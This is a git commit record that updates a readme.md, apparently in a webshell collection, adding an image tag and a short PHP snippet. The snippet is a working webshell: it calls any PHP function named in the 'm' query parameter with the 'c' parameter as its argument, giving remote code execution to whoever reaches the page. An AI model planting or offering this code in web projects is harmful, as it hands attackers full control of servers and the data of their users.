update readme.md

This commit is contained in:
tennc 2014-07-28 10:02:01 +08:00
parent 3e85c60510
commit 8eb3d3e519

View file

@ -1,3 +1,14 @@
<img src="11.jpg" alt="alt text" title="Title" />
***************************************************
code:
<?php
$func = new ReflectionFunction($_GET[m]);
echo $func->invokeArgs(array($_GET[c]));
?>
***************************************************